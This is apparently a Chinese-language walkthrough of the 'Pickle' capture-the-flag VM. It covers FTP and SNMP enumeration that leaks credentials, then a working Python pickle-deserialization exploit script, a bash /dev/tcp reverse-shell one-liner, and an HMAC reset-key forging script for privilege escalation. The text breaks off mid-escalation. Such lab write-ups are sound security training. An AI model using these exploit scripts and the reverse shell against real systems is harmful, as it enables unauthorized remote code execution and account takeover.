![\"image-20240912141043011\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409121746218.png\")
<\/div>\n
![\"image-20240912155527327\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409121746220.png\")
<\/div><\/p>\n\u4fe1\u606f\u641c\u96c6<\/h2>\n\u7aef\u53e3\u626b\u63cf<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Pickle]\n\u2514\u2500$ rustscan -a $IP -- -sCV \n.----. .-. .-. .----..---. .----. .---. .--. .-. .-.\n| {} }| { } |{ {__ {_ _}{ {__ \/ ___} \/ {} \\ | `| |\n| .-. \\| {_} |.-._} } | | .-._} }\\ }\/ \/\\ \\| |\\ |\n`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nReal hackers hack time \u231b\n\n[~] The config file is expected to be at "\/home\/kali\/.rustscan.toml"\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. \nOpen 192.168.10.105:21\nOpen 192.168.10.105:1337\n\nPORT STATE SERVICE REASON VERSION\n21\/tcp open ftp syn-ack vsftpd 3.0.3\n| ftp-syst: \n| STAT: \n| FTP server status:\n| Connected to ::ffff:192.168.10.102\n| Logged in as ftp\n| TYPE: ASCII\n| No session bandwidth limit\n| Session timeout in seconds is 300\n| Control connection is plain text\n| Data connections will be plain text\n| At session startup, client count was 3\n| vsFTPd 3.0.3 - secure, fast, stable\n|_End of status\n| ftp-anon: Anonymous FTP login allowed (FTP code 230)\n|_-rwxr-xr-x 1 0 0 1306 Oct 12 2020 init.py.bak\n1337\/tcp open http syn-ack Werkzeug httpd 1.0.1 (Python 2.7.16)\n| http-methods: \n|_ Supported Methods: HEAD GET POST OPTIONS\n|_http-server-header: Werkzeug\/1.0.1 Python\/2.7.16\n| http-auth: \n| HTTP\/1.0 401 UNAUTHORIZED\\x0D\n|_ Basic realm=Pickle login\n|_http-title: Site doesn't have a title (text\/html; charset=utf-8).\nService Info: OS: Unix<\/code><\/pre>\n\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n\u654f\u611f\u7aef\u53e3\u6d4b\u8bd5<\/h3>\n
\u67e5\u770b\u4e00\u4e0bftp<\/code>\u670d\u52a1\u5185\u5bb9\uff1a<\/p>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Pickle]\n\u2514\u2500$ ftp $IP\nConnected to 192.168.10.105.\n220 (vsFTPd 3.0.3)\nName (192.168.10.105:kali): anonymous\n331 Please specify the password.\nPassword: \n230 Login successful.\nRemote system type is UNIX.\nUsing binary mode to transfer files.\nftp> dir\n229 Entering Extended Passive Mode (|||6295|)\n150 Here comes the directory listing.\n-rwxr-xr-x 1 0 0 1306 Oct 12 2020 init.py.bak\n226 Directory send OK.\nftp> get init.py.bak\nlocal: init.py.bak remote: init.py.bak\n229 Entering Extended Passive Mode (|||31148|)\n150 Opening BINARY mode data connection for init.py.bak (1306 bytes).\n100% |************************************************************************************************************************************************| 1306 32.87 KiB\/s 00:00 ETA\n226 Transfer complete.\n1306 bytes received in 00:00 (31.28 KiB\/s)\nftp> exit\n221 Goodbye.\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Pickle]\n\u2514\u2500$ cat init.py.bak \nfrom functools import wraps\nfrom flask import *\nimport hashlib\nimport socket\nimport base64\nimport pickle\nimport hmac\n\napp = Flask(__name__, template_folder="templates", static_folder="\/opt\/project\/static\/")\n\n@app.route('\/', methods=["GET", "POST"])\ndef index_page():\n '''\n __index_page__()\n '''\n if request.method == "POST" and request.form["story"] and request.form["submit"]:\n md5_encode = hashlib.md5(request.form["story"]).hexdigest()\n paths_page = "\/opt\/project\/uploads\/%s.log" %(md5_encode)\n write_page = open(paths_page, "w")\n write_page.write(request.form["story"])\n\n return "The message was sent successfully!"\n\n return render_template("index.html")\n\n@app.route('\/reset', methods=["GET", "POST"])\ndef reset_page():\n '''\n __reset_page__()\n '''\n pass\n\n@app.route('\/checklist', methods=["GET", "POST"])\ndef check_page():\n '''\n __check_page__()\n '''\n if request.method == "POST" and request.form["check"]:\n path_page = "\/opt\/project\/uploads\/%s.log" %(request.form["check"])\n open_page = open(path_page, "rb").read()\n if "p1" in open_page:\n open_page = pickle.loads(open_page)\n return str(open_page)\n else:\n return open_page\n else:\n return "Server Error!"\n\n return render_template("checklist.html")\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=1337, debug=True)<\/code><\/pre>\n\u8e29\u70b9\uff0c\u53d1\u73b0\u5b58\u5728\u9a8c\u8bc1\uff1a<\/p>\n
![\"image-20240912155957278\"](\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\")
<\/div><\/p>\n\u6ca1\u6709\u5176\u4ed6\u7684\u529e\u6cd5\uff0c\u5c1d\u8bd5\u7206\u7834\uff0c\u4f46\u662f\u672a\u679c\u3002<\/p>\n
UDP\u670d\u52a1\u626b\u63cf<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Pickle]\n\u2514\u2500$ sudo nmap -sU -top 100 $IP \nStarting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-09-12 04:01 EDT\nStats: 0:02:05 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan\nUDP Scan Timing: About 99.99% done; ETC: 04:04 (0:00:00 remaining)\nNmap scan report for 192.168.10.105\nHost is up (0.00089s latency).\nNot shown: 96 closed udp ports (port-unreach)\nPORT STATE SERVICE\n68\/udp open|filtered dhcpc\n161\/udp open snmp\n631\/udp open|filtered ipp\n5353\/udp open|filtered zeroconf\nMAC Address: 08:00:27:C5:BC:73 (Oracle VirtualBox virtual NIC)<\/code><\/pre>\n\u68c0\u67e5\u4e00\u4e0bsnmp<\/code>\u670d\u52a1\uff0c\u67e5\u770b\u4e00\u4e0b\u6709\u5565\u547d\u4ee4\uff1ahttps:\/\/book.hacktricks.xyz\/network-services-pentesting\/pentesting-snmp#enumerating-snmp<\/a><\/p>\n\u5c1d\u8bd5\u68c0\u7d22\u4e00\u4e0b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Pickle]\n\u2514\u2500$ snmpwalk -v X -c public $IP \nInvalid version specified after -v flag: X\nUSAGE: snmpwalk [OPTIONS] AGENT [OID]\n\n Version: 5.9.4.pre2\n Web: http:\/\/www.net-snmp.org\/\n Email: net-snmp-coders@lists.sourceforge.net\n\nOPTIONS:\n -h, --help display this help message\n -H display configuration file directives understood\n -v 1|2c|3 specifies SNMP version to use\n -V, --version display package version number\nSNMP Version 1 or 2c specific\n -c COMMUNITY set the community string\nSNMP Version 3 specific\n -a PROTOCOL set authentication protocol (MD5|SHA|SHA-224|SHA-256|SHA-384|SHA-512)\n -A PASSPHRASE set authentication protocol pass phrase\n -e ENGINE-ID set security engine ID (e.g. 800000020109840301)\n -E ENGINE-ID set context engine ID (e.g. 800000020109840301)\n -l LEVEL set security level (noAuthNoPriv|authNoPriv|authPriv)\n -n CONTEXT set context name (e.g. bridge1)\n -u USER-NAME set security name (e.g. bert)\n -x PROTOCOL set privacy protocol (DES|AES|AES-192|AES-256)\n -X PASSPHRASE set privacy protocol pass phrase\n -Z BOOTS,TIME set destination engine boots\/time\nGeneral communication options\n -r RETRIES set the number of retries\n -t TIMEOUT set the request timeout (in seconds)\nDebugging\n -d dump input\/output packets in hexadecimal\n -D[TOKEN[,...]] turn on debugging output for the specified TOKENs\n (ALL gives extremely verbose debugging output)\nGeneral options\n -m MIB[:...] load given list of MIBs (ALL loads everything)\n -M DIR[:...] look in given list of directories for MIBs\n (default: $HOME\/.snmp\/mibs:\/usr\/share\/snmp\/mibs:\/usr\/share\/snmp\/mibs\/iana:\/usr\/share\/snmp\/mibs\/ietf)\n -P MIBOPTS Toggle various defaults controlling MIB parsing:\n u: allow the use of underlines in MIB symbols\n c: disallow the use of "--" to terminate comments\n d: save the DESCRIPTIONs of the MIB objects\n e: disable errors when MIB symbols conflict\n w: enable warnings when MIB symbols conflict\n W: enable detailed warnings when MIB symbols conflict\n R: replace MIB symbols from latest module\n -O OUTOPTS Toggle various defaults controlling output display:\n 0: print leading 0 for single-digit hex characters\n a: print all strings in ascii format\n b: do not break OID indexes down\n e: print enums numerically\n E: escape quotes in string indices\n f: print full OIDs on output\n n: print OIDs numerically\n p PRECISION: display floating point values with specified PRECISION (printf format string)\n q: quick print for easier parsing\n Q: quick print with equal-signs\n s: print only last symbolic element of OID\n S: print MIB module-id plus last element\n t: print timeticks unparsed as numeric integers\n T: print human-readable text along with hex strings\n u: print OIDs using UCD-style prefix suppression\n U: don't print units\n v: print values only (not OID = value)\n x: print all strings in hex format\n X: extended index format\n -I INOPTS Toggle various defaults controlling input parsing:\n b: do best\/regex matching to find a MIB node\n h: don't apply DISPLAY-HINTs\n r: do not check values for range\/type legality\n R: do random access to OID labels\n u: top-level OIDs must have '.' prefix (UCD-style)\n s SUFFIX: Append all textual OIDs with SUFFIX before parsing\n S PREFIX: Prepend all textual OIDs with PREFIX before parsing\n -L LOGOPTS Toggle various defaults controlling logging:\n e: log to standard error\n o: log to standard output\n n: don't log at all\n f file: log to the specified file\n s facility: log to syslog (via the specified facility)\n\n (variants)\n [EON] pri: log to standard error, output or \/dev\/null for level 'pri' and above\n [EON] p1-p2: log to standard error, output or \/dev\/null for levels 'p1' to 'p2'\n [FS] pri token: log to file\/syslog for level 'pri' and above\n [FS] p1-p2 token: log to file\/syslog for levels 'p1' to 'p2'\n -C APPOPTS Set various application specific behaviours:\n p: print the number of variables found\n i: include given OID in the search range\n I: don't include the given OID, even if no results are returned\n c: do not check returned OIDs are increasing\n t: Display wall-clock time to complete the walk\n T: Display wall-clock time to complete each request\n E {OID}: End the walk at the specified OID\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Pickle]\n\u2514\u2500$ snmpwalk -v 1 -c public $IP \niso.3.6.1.2.1.1.1.0 = STRING: "Linux pickle 4.19.0-11-amd64 #1 SMP Debian 4.19.146-1 (2020-09-17) x86_64"\niso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10\niso.3.6.1.2.1.1.3.0 = Timeticks: (121922) 0:20:19.22\niso.3.6.1.2.1.1.4.0 = STRING: "lucas:SuperSecretPassword123!"\niso.3.6.1.2.1.1.5.0 = STRING: "pickle"\niso.3.6.1.2.1.1.6.0 = STRING: "Sitting on the Dock of the Bay"\niso.3.6.1.2.1.1.7.0 = INTEGER: 72\niso.3.6.1.2.1.1.8.0 = Timeticks: (57) 0:00:00.57\niso.3.6.1.2.1.1.9.1.2.1 = OID: iso.3.6.1.6.3.11.3.1.1\niso.3.6.1.2.1.1.9.1.2.2 = OID: iso.3.6.1.6.3.15.2.1.1\niso.3.6.1.2.1.1.9.1.2.3 = OID: iso.3.6.1.6.3.10.3.1.1\niso.3.6.1.2.1.1.9.1.2.4 = OID: iso.3.6.1.6.3.1\niso.3.6.1.2.1.1.9.1.2.5 = OID: iso.3.6.1.6.3.16.2.2.1\niso.3.6.1.2.1.1.9.1.2.6 = OID: iso.3.6.1.2.1.49\niso.3.6.1.2.1.1.9.1.2.7 = OID: iso.3.6.1.2.1.4\niso.3.6.1.2.1.1.9.1.2.8 = OID: iso.3.6.1.2.1.50\niso.3.6.1.2.1.1.9.1.2.9 = OID: iso.3.6.1.6.3.13.3.1.3\niso.3.6.1.2.1.1.9.1.2.10 = OID: iso.3.6.1.2.1.92\niso.3.6.1.2.1.1.9.1.3.1 = STRING: "The MIB for Message Processing and Dispatching."\niso.3.6.1.2.1.1.9.1.3.2 = STRING: "The management information definitions for the SNMP User-based Security Model."\niso.3.6.1.2.1.1.9.1.3.3 = STRING: "The SNMP Management Architecture MIB."\niso.3.6.1.2.1.1.9.1.3.4 = STRING: "The MIB module for SNMPv2 entities"\niso.3.6.1.2.1.1.9.1.3.5 = STRING: "View-based Access Control Model for SNMP."\niso.3.6.1.2.1.1.9.1.3.6 = STRING: "The MIB module for managing TCP implementations"\niso.3.6.1.2.1.1.9.1.3.7 = STRING: "The MIB module for managing IP and ICMP implementations"\niso.3.6.1.2.1.1.9.1.3.8 = STRING: "The MIB module for managing UDP implementations"\niso.3.6.1.2.1.1.9.1.3.9 = STRING: "The MIB modules for managing SNMP Notification, plus filtering."\niso.3.6.1.2.1.1.9.1.3.10 = STRING: "The MIB module for logging SNMP Notifications."\niso.3.6.1.2.1.1.9.1.4.1 = Timeticks: (55) 0:00:00.55\niso.3.6.1.2.1.1.9.1.4.2 = Timeticks: (55) 0:00:00.55\niso.3.6.1.2.1.1.9.1.4.3 = Timeticks: (55) 0:00:00.55\niso.3.6.1.2.1.1.9.1.4.4 = Timeticks: (55) 0:00:00.55\niso.3.6.1.2.1.1.9.1.4.5 = Timeticks: (55) 0:00:00.55\niso.3.6.1.2.1.1.9.1.4.6 = Timeticks: (55) 0:00:00.55\niso.3.6.1.2.1.1.9.1.4.7 = Timeticks: (55) 0:00:00.55\niso.3.6.1.2.1.1.9.1.4.8 = Timeticks: (55) 0:00:00.55\niso.3.6.1.2.1.1.9.1.4.9 = Timeticks: (55) 0:00:00.55\niso.3.6.1.2.1.1.9.1.4.10 = Timeticks: (57) 0:00:00.57\niso.3.6.1.2.1.25.1.1.0 = Timeticks: (122955) 0:20:29.55\niso.3.6.1.2.1.25.1.2.0 = Hex-STRING: 07 E8 09 0C 04 0E 02 00 2D 04 00 \niso.3.6.1.2.1.25.1.3.0 = INTEGER: 393216\niso.3.6.1.2.1.25.1.4.0 = STRING: "BOOT_IMAGE=\/boot\/vmlinuz-4.19.0-11-amd64 root=UUID=1612bec5-c369-4a38-a5d9-61c9328c9afa ro quiet\n"\niso.3.6.1.2.1.25.1.5.0 = Gauge32: 0\niso.3.6.1.2.1.25.1.6.0 = Gauge32: 68\niso.3.6.1.2.1.25.1.7.0 = INTEGER: 0\nEnd of MIB<\/code><\/pre>\n\u627e\u5230\u4e00\u7ec4\u5bc6\u94a5\uff1a<\/p>\n
lucas\nSuperSecretPassword123!<\/code><\/pre>\n\u5f53\u6210\u8d26\u53f7\u5bc6\u7801\u53d1\u73b0\u53ef\u4ee5\u767b\u5f551337<\/code>\u7aef\u53e3\uff1a<\/p>\n<\/div><\/p>\n\u8def\u7531\u5206\u6790<\/h3>\n
\u6e90\u4ee3\u7801\u5982\u4e0b\uff1a<\/p>\n
from functools import wraps\nfrom flask import *\nimport hashlib\nimport socket\nimport base64\nimport pickle\nimport hmac\n\napp = Flask(__name__, template_folder="templates", static_folder="\/opt\/project\/static\/")\n\n@app.route('\/', methods=["GET", "POST"])\ndef index_page():\n '''\n __index_page__()\n '''\n if request.method == "POST" and request.form["story"] and request.form["submit"]: \n # \u68c0\u67e5 POST \u6570\u636e\u4e2d\u4e2d\u7684 `story` \u548c `submit` \u4e24\u4e2a\u53d8\u91cf\n md5_encode = hashlib.md5(request.form["story"]).hexdigest()\n # md5 \u52a0\u5bc6 story \u7684\u6570\u636e\n paths_page = "\/opt\/project\/uploads\/%s.log" %(md5_encode)\n write_page = open(paths_page, "w")\n write_page.write(request.form["story"])\n # \u8bb0\u5f55\u65e5\u5fd7\u4fe1\u606f\n\n return "The message was sent successfully!"\n\n return render_template("index.html")\n\n@app.route('\/reset', methods=["GET", "POST"])\ndef reset_page():\n '''\n __reset_page__()\n '''\n pass\n\n@app.route('\/checklist', methods=["GET", "POST"])\ndef check_page():\n '''\n __check_page__()\n '''\n if request.method == "POST" and request.form["check"]:\n path_page = "\/opt\/project\/uploads\/%s.log" %(request.form["check"])\n open_page = open(path_page, "rb").read()\n if "p1" in open_page:\n # \u5982\u679c p1 \u5b57\u6bb5\u5b58\u5728\uff0c\u5219\u53cd\u5e8f\u5217\u5316\n open_page = pickle.loads(open_page)\n return str(open_page)\n else:\n return open_page\n else:\n return "Server Error!"\n\n return render_template("checklist.html")\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=1337, debug=True)<\/code><\/pre>\n\u5b58\u5728\u4e09\u7ec4\u8def\u7531\uff1a<\/p>\n
\n\/<\/code><\/li>\n\/reset<\/code><\/li>\n\/checklist<\/code><\/li>\n<\/ul>\n\u591a\u7684\u4e0d\u89e3\u91ca\u4e86\uff0c\u8fd9\u4e2a\u903b\u8f91\u770b\u8d77\u6765\u4e0d\u96be\uff0c\u5c1d\u8bd5\u4e00\u4e0b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Pickle]\n\u2514\u2500$ curl -s -u 'lucas:SuperSecretPassword123!' http:\/\/192.168.10.105:1337\/ -d "story=hgbe02"\n..........\n<!--\n\nTraceback (most recent call last):\n File "\/usr\/local\/lib\/python2.7\/dist-packages\/flask\/app.py", line 2464, in __call__\n return self.wsgi_app(environ, start_response)\n File "\/usr\/local\/lib\/python2.7\/dist-packages\/flask\/app.py", line 2450, in wsgi_app\n response = self.handle_exception(e)\n File "\/usr\/local\/lib\/python2.7\/dist-packages\/flask\/app.py", line 1867, in handle_exception\n reraise(exc_type, exc_value, tb)\n File "\/usr\/local\/lib\/python2.7\/dist-packages\/flask\/app.py", line 2447, in wsgi_app\n response = self.full_dispatch_request()\n File "\/usr\/local\/lib\/python2.7\/dist-packages\/flask\/app.py", line 1952, in full_dispatch_request\n rv = self.handle_user_exception(e)\n File "\/usr\/local\/lib\/python2.7\/dist-packages\/flask\/app.py", line 1821, in handle_user_exception\n reraise(exc_type, exc_value, tb)\n File "\/usr\/local\/lib\/python2.7\/dist-packages\/flask\/app.py", line 1950, in full_dispatch_request\n rv = self.dispatch_request()\n File "\/usr\/local\/lib\/python2.7\/dist-packages\/flask\/app.py", line 1936, in dispatch_request\n return self.view_functions[rule.endpoint](**req.view_args)\n File "\/opt\/project\/project.py", line 30, in decorated\n return f(*args, **kwargs)\n File "\/opt\/project\/project.py", line 39, in index_page\n if request.method == "POST" and request.form["story"] and request.form["submit"]:\n File "\/usr\/local\/lib\/python2.7\/dist-packages\/werkzeug\/datastructures.py", line 442, in __getitem__\n raise exceptions.BadRequestKeyError(key)\nBadRequestKeyError: 400 Bad Request: The browser (or proxy) sent a request that this server could not understand.\nKeyError: 'submit'\n\n-->\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Pickle]\n\u2514\u2500$ curl -s -u 'lucas:SuperSecretPassword123!' http:\/\/192.168.10.105:1337\/ -d "story=hgbe02&submit=%E6%8F%90%E4%BA%A4"\nThe message was sent successfully!\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Pickle]\n\u2514\u2500$ echo -n 'hgbe02' | md5sum \n105abaedc26fb12d3fd5440a6ea8e27c -\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Pickle]\n\u2514\u2500$ curl -s -u 'lucas:SuperSecretPassword123!' http:\/\/192.168.10.105:1337\/checklist -d "check=105abaedc26fb12d3fd5440a6ea8e27c" \nhgbe02<\/code><\/pre>\n\u901a\u8fc7\u62a5\u9519\uff0c\u53d1\u73b0python\u7248\u672c\u4e3apython2.7<\/code>\uff0c\u540c\u65f6\u4e5f\u53ef\u4ee5\u4f7f\u7528md5\u627e\u5230\u6587\u4ef6\uff01<\/p>\npickle\u5229\u7528<\/h3>\n
\u5c1d\u8bd5\u8fdb\u884c\u53cd\u5e8f\u5217\u5316\u5229\u7528\uff0c\u8fd9\u91cc\u76f4\u63a5\u5f15\u7528\u522b\u7684\u5e08\u5085\u5199\u597d\u7684\u811a\u672c\u8fa3\uff1a<\/p>\n
#coding:utf-8\nimport os\nimport cPickle\nimport hashlib\nimport requests\n\nclass CommandExecute(object):\n def __reduce__(self):\n return (os.system, ('ping -c 1 192.168.10.102',))\n\nconvert_data = cPickle.dumps(CommandExecute())\nconvert_crypt = hashlib.md5(convert_data).hexdigest()\nsend_requests = requests.post('http:\/\/192.168.10.105:1337\/', data={"story":convert_data, "submit":"Submit+Query"}, auth=("lucas", "SuperSecretPassword123!"))\ncheck_requests = requests.post('http:\/\/192.168.10.105:1337\/checklist', data={"check":convert_crypt}, auth=("lucas", "SuperSecretPassword123!"))\nprint(check_requests.text)<\/code><\/pre>\n\u591a\u6b21\u8fd0\u884c\u53d1\u73b0\u53ef\u4ee5ping\u6210\u529f\uff01<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Pickle]\n\u2514\u2500$ python2 exp.py 2>\/dev\/null\n0\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Pickle]\n\u2514\u2500$ sudo tcpdump -i eth1 icmp \ntcpdump: verbose output suppressed, use -v[v]... for full protocol decode\nlistening on eth1, link-type EN10MB (Ethernet), snapshot length 262144 bytes\n05:20:44.205898 IP 192.168.10.105 > 192.168.10.102: ICMP echo request, id 491, seq 1, length 64\n05:20:44.205941 IP 192.168.10.102 > 192.168.10.105: ICMP echo reply, id 491, seq 1, length 64\n05:21:08.452970 IP 192.168.10.105 > 192.168.10.102: ICMP echo request, id 495, seq 1, length 64\n05:21:08.452988 IP 192.168.10.102 > 192.168.10.105: ICMP echo reply, id 495, seq 1, length 64<\/code><\/pre>\n\u4fee\u6539\u76f8\u5173\u547d\u4ee4\uff0c\u53cd\u5f39shell\uff01<\/p>\n
bash -c "exec bash -i &>\/dev\/tcp\/192.168.10.102\/1234 <&1"<\/code><\/pre>\n<\/div><\/p>\n\u63d0\u6743<\/h2>\n\u4fe1\u606f\u641c\u96c6<\/h3>\n(remote) lucas@pickle:\/home\/lucas$ whoami;id\nlucas\nuid=1000(lucas) gid=1000(lucas) groups=1000(lucas),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth),115(lpadmin),116(scanner)\n(remote) lucas@pickle:\/home\/lucas$ ls -la\ntotal 32\ndrwxr-xr-x 3 lucas lucas 4096 Oct 11 2020 .\ndrwxr-xr-x 4 root root 4096 Oct 12 2020 ..\n-rw------- 1 lucas lucas 1 Oct 12 2020 .bash_history\n-rw-r--r-- 1 lucas lucas 220 Oct 11 2020 .bash_logout\n-rw-r--r-- 1 lucas lucas 3526 Oct 11 2020 .bashrc\ndrwxr-xr-x 3 lucas lucas 4096 Oct 11 2020 .local\n-rw-r--r-- 1 lucas lucas 807 Oct 11 2020 .profile\n-rw-r--r-- 1 lucas lucas 66 Oct 11 2020 .selected_editor\n(remote) lucas@pickle:\/home\/lucas$ sudo -l\nbash: sudo: command not found\n(remote) lucas@pickle:\/home\/lucas$ find \/ -perm -u=s -type f 2>\/dev\/null\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/eject\/dmcrypt-get-device\n\/usr\/lib\/policykit-1\/polkit-agent-helper-1\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/bin\/pkexec\n\/usr\/bin\/gpasswd\n\/usr\/bin\/newgrp\n\/usr\/bin\/mount\n\/usr\/bin\/passwd\n\/usr\/bin\/chfn\n\/usr\/bin\/chsh\n\/usr\/bin\/umount\n\/usr\/bin\/su\n(remote) lucas@pickle:\/home\/lucas$ cd \/opt\n(remote) lucas@pickle:\/opt$ ls -la\ntotal 12\ndrwxr-xr-x 3 root root 4096 Oct 11 2020 .\ndrwxr-xr-x 18 root root 4096 Oct 11 2020 ..\ndrwxr-xr-x 5 root root 4096 Oct 12 2020 project\n(remote) lucas@pickle:\/opt$ cd project\/\n(remote) lucas@pickle:\/opt\/project$ ls -la\ntotal 24\ndrwxr-xr-x 5 root root 4096 Oct 12 2020 .\ndrwxr-xr-x 3 root root 4096 Oct 11 2020 ..\n-rwxr-xr-x 1 root root 2654 Oct 12 2020 project.py\ndrwxr-xr-x 4 root root 4096 Oct 11 2020 static\ndrwxr-xr-x 2 root root 4096 Oct 11 2020 templates\ndrwxrwxrwx 2 root root 4096 Sep 12 05:28 uploads\n(remote) lucas@pickle:\/opt\/project$ cat project.py \nfrom functools import wraps\nfrom flask import *\nimport hashlib\nimport socket\nimport base64\nimport pickle\nimport hmac\n\napp = Flask(__name__, template_folder="templates", static_folder="\/opt\/project\/static\/")\n\ndef check_auth(username, password):\n """This function is called to check if a username \/\n password combination is valid.\n """\n return username == 'lucas' and password == 'SuperSecretPassword123!'\n\ndef authenticate():\n """Sends a 401 response that enables basic auth"""\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm="Pickle login"'})\n\ndef requires_auth(f):\n @wraps(f)\n def decorated(*args, **kwargs):\n auth = request.authorization\n if not auth or not check_auth(auth.username, auth.password):\n return authenticate()\n return f(*args, **kwargs)\n return decorated\n\n@app.route('\/', methods=["GET", "POST"])\n@requires_auth\ndef index_page():\n '''\n __index_page__()\n '''\n if request.method == "POST" and request.form["story"] and request.form["submit"]:\n md5_encode = hashlib.md5(request.form["story"]).hexdigest()\n paths_page = "\/opt\/project\/uploads\/%s.log" %(md5_encode)\n write_page = open(paths_page, "w")\n write_page.write(request.form["story"])\n\n return "The message was sent successfully!"\n\n return render_template("index.html")\n\n@app.route('\/reset', methods=["GET", "POST"])\n@requires_auth\ndef reset_page():\n '''\n __reset_page__()\n '''\n if request.method == "POST" and request.form["username"] and request.form["key"]:\n key = "dpff43f3p214k31301"\n raw = request.form["username"] + key + socket.gethostbyname(socket.gethostname())\n hashed = hmac.new(key, raw, hashlib.sha1)\n if request.form["key"] == hashed.hexdigest():\n return base64.b64encode(hashed.digest().encode("base64").rstrip("\\n"))\n else:\n return "Server Error!"\n return render_template("reset.html")\n\n@app.route('\/checklist', methods=["GET", "POST"])\n@requires_auth\ndef check_page():\n '''\n __check_page__()\n '''\n if request.method == "POST" and request.form["check"]:\n path_page = "\/opt\/project\/uploads\/%s.log" %(request.form["check"])\n open_page = open(path_page, "rb").read()\n if "p1" in open_page:\n open_page = pickle.loads(open_page)\n return str(open_page)\n else:\n return open_page\n else:\n return "Server Error!"\n\n return render_template("checklist.html")\n\n@app.route('\/console')\n@requires_auth\ndef secret_page():\n return "Server Error!"\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=1337, debug=True)\n(remote) lucas@pickle:\/opt\/project$ cd uploads\n(remote) lucas@pickle:\/opt\/project\/uploads$ ls -la\ntotal 28\ndrwxrwxrwx 2 root root 4096 Sep 12 05:28 .\ndrwxr-xr-x 5 root root 4096 Oct 12 2020 ..\n-rw-r--r-- 1 lucas lucas 6 Sep 12 04:32 105abaedc26fb12d3fd5440a6ea8e27c.log\n-rw-r--r-- 1 lucas lucas 58 Sep 12 05:21 110207bbd89a69ddcf2b2aebb3b380d5.log\n-rw-r--r-- 1 lucas lucas 91 Sep 12 05:28 8c809790306c09de2a350426a25d7de3.log\n-rw-r--r-- 1 lucas lucas 4 Sep 12 04:24 b59c67bf196a4758191e42f76670ceba.log\n-rw-r--r-- 1 lucas lucas 9 Sep 12 04:24 bbb8aae57c104cda40c93843ad5e6db8.log\n(remote) lucas@pickle:\/opt\/project\/uploads$ cat \/etc\/passwd | grep sh\nroot:x:0:0:root:\/root:\/bin\/bash\nlucas:x:1000:1000:lucas,,,:\/home\/lucas:\/bin\/bash\nmark:x:1001:1001::\/home\/mark:\/bin\/bash<\/code><\/pre>\n\u5229\u7528<\/h3>\n
\u5c1d\u8bd5\u4f7f\u7528\u811a\u672c\u8fdb\u884c\u5229\u7528\uff1a<\/p>\n
import hashlib\nimport socket\nimport base64\nimport hmac\n\nuser=['lucas', 'mark']\nfor i in user:\n key = "dpff43f3p214k31301"\n raw = i + key + socket.gethostbyname(socket.gethostname())\n hashed = hmac.new(key, raw, hashlib.sha1)\n print("[+] USER:",i)\n print(base64.b64encode(hashed.digest().encode("base64").rstrip("\\n")))<\/code><\/pre>\n\u5c1d\u8bd5\u8fd0\u884c\uff1a<\/p>\n
(remote) lucas@pickle:\/opt\/project\/uploads$ cd \/tmp\n(remote) lucas@pickle:\/tmp$ nano exp.py&&chmod +x exp.py\n(remote) lucas@pickle:\/tmp$ python2 exp.py \n('[+] USER:', 'lucas')\nYTdYYTB1cDFQOTBmeEFwclVXZVBpTCtmakx3PQ==\n('[+] USER:', 'mark')\nSUk5enROY2FnUWxnV1BUWFJNNXh4amxhc00wPQ==<\/code><\/pre>\n\u5c1d\u8bd5\u4fee\u6539\u5bc6\u7801\u4ee5\u53ca\u5207\u6362\u7528\u6237\uff1a<\/p>\n
